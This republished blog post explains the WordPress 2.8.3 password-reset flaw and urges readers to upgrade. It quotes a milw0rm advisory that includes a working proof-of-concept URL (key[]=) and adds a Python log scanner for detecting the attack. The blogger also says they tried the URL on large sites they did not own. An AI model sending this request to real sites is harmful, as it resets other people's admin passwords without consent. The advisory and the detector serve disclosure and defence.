Upgrade WordPress to version 2.8.4
I was browsing the internet, specifically the Albanian webmasters' forum (webmaster.al), and saw an announcement from Olgi describing a flaw in version 2.8.3, warning that your site could at any moment become a target for hackers who could cause you some damage.

This flaw did not last long, because the WordPress team patched it immediately and released version 2.8.4, which is in order and, for now, free of any known flaw. So what I would recommend is that you update all of your WordPress-built blogs to version 2.8.4.
Greetings,

This morning when I woke up I saw that an email had arrived in my inbox for resetting my password, although I had not actually requested a new password. I thought it was someone trying to make fun of me, but when I looked into it a bit more I saw that someone (some bright mind) had managed to find a problem in every version of WordPress 2.8.3 and below, and with the URL below (knowing the administrator's email) was resetting the password.

http://www.domainname.com/wp-login.php?action=rp&key[]=

It is not a big problem, since it is not as if they gained access to your blog, but WordPress immediately released update 2.8.4, so I suggest you update to the latest version.

I tried this personally on some really big foreign sites and it worked. I stress, there is no real risk, it just changes your password and you have to change it again.
I looked around the internet a bit more about this problem and came across this exploit posted on milw0rm:
=============================================
- Release date: August 10th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium
=============================================

I. VULNERABILITY
-------------------------
WordPress <= 2.8.3 Remote admin reset password

II. BACKGROUND
-------------------------
WordPress is a state-of-the-art publishing platform with a focus on
aesthetics, web standards, and usability. WordPress is both free and
priceless at the same time. More simply, WordPress is what you use when
you want to work with your blogging software, not fight it.

III. DESCRIPTION
-------------------------
The way WordPress handles a password reset looks like this:

You submit your email address or username via this form:
/wp-login.php?action=lostpassword

WordPress sends you a reset confirmation like this via email:

"Someone has asked to reset the password for the following site and username.
http://DOMAIN_NAME.TLD/wordpress
Username: admin
To reset your password visit the following address, otherwise just ignore
this email and nothing will happen
http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag"

You click on the link, and then WordPress resets your admin password, and
sends you another email with your new credentials.

Let's see how it works:

wp-login.php:

...[snip]...
line 186:
function reset_password($key) {
    global $wpdb;

    $key = preg_replace('/[^a-z0-9]/i', '', $key);

    if ( empty( $key ) )
        return new WP_Error('invalid_key', __('Invalid key'));

    $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));
    if ( empty( $user ) )
        return new WP_Error('invalid_key', __('Invalid key'));
...[snip]...

line 276:
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
$errors = new WP_Error();

if ( isset($_GET['key']) )
    $action = 'resetpass';

// validate action so as to default to the login screen
if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword', 'resetpass', 'rp', 'register', 'login')) && false === has_filter('login_form_' . $action) )
    $action = 'login';
...[snip]...

line 370:
    break;

case 'resetpass' :
case 'rp' :
    $errors = reset_password($_GET['key']);

    if ( ! is_wp_error($errors) ) {
        wp_redirect('wp-login.php?checkemail=newpass');
        exit();
    }

    wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
    exit();

    break;
...[snip]...

You can abuse the password reset function, bypass the first step and
then reset the admin password by submitting an array to the $key
variable.

IV. PROOF OF CONCEPT
-------------------------
A web browser is sufficient to reproduce this proof of concept:
http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=
The password will be reset without any confirmation.

V. BUSINESS IMPACT
-------------------------
An attacker could exploit this vulnerability to compromise the admin
account of any wordpress/wordpress-mu <= 2.8.3

VI. SYSTEMS AFFECTED
-------------------------
All

VII. SOLUTION
-------------------------
No patch available for the moment.

VIII. REFERENCES
-------------------------
http://www.wordpress.org

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
I'd like to shoot some greetz to securityreason.com for their great
research on PHP, as for this under-estimated vulnerability discovered by
Maksymilian Arciemowicz : http://securityreason.com/achievement_securityalert/38

X. REVISION HISTORY
-------------------------
August 10th, 2009: Initial release

XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

# milw0rm.com [2009-08-11]
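If you want to check whether your site received this request before you upgraded, the following script is an added example (it is not from this post, the forum post, or the advisory) that scans web-server access log lines in the combined format for wp-login.php requests whose key parameter is sent in PHP array syntax (key[]=, or percent-encoded as key%5B%5D=), which is what makes PHP hand an array instead of a string to reset_password(). The log lines and IP addresses below are constructed for the example.

```python
import re
from typing import Optional
from urllib.parse import parse_qsl, urlsplit

# Combined log format prefix: ip ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

def classify_request(target: str) -> Optional[str]:
    """Return why a request target is suspicious, or None if it looks normal."""
    parts = urlsplit(target)
    if not parts.path.endswith("wp-login.php"):
        return None
    # The vulnerable handler switches to 'resetpass' whenever $_GET['key'] is set,
    # so the action value is irrelevant; a parameter *name* like key[] or key[0]
    # is what makes PHP build an array. parse_qsl decodes key%5B%5D to key[] too.
    for name, _value in parse_qsl(parts.query, keep_blank_values=True):
        if name.startswith("key["):
            return f"reset key sent as a PHP array parameter ({name!r})"
    return None

def scan_log(lines):
    """Return one finding per combined-format line that classify_request flags."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip it rather than crash
        reason = classify_request(m.group("target"))
        if reason:
            findings.append({"ip": m.group("ip"), "time": m.group("time"),
                             "status": m.group("status"),
                             "target": m.group("target"), "reason": reason})
    return findings

# Constructed sample lines (not real traffic). The first two are the request
# from the post, plain and percent-encoded; the third is a legitimate reset.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Aug/2009:08:14:02 +0200] "GET /wp-login.php?action=rp&key[]= HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [11/Aug/2009:08:14:09 +0200] "GET /blog/wp-login.php?action=rp&key%5B%5D= HTTP/1.1" 302 0 "-" "curl/7.19"',
    '198.51.100.7 - - [11/Aug/2009:09:00:11 +0200] "GET /wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [11/Aug/2009:09:01:00 +0200] "GET /wp-login.php?action=lostpassword HTTP/1.1" 200 1523 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['status']} {f['target']} -> {f['reason']}")
```

A hit does not prove the reset succeeded, so pair it with any unexpected "password reset" emails from the same time window, as the forum post describes.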
This article was taken from: http://granit.blog.al/?p=288. For more similar articles visit: http://granit.blog.al/?p=288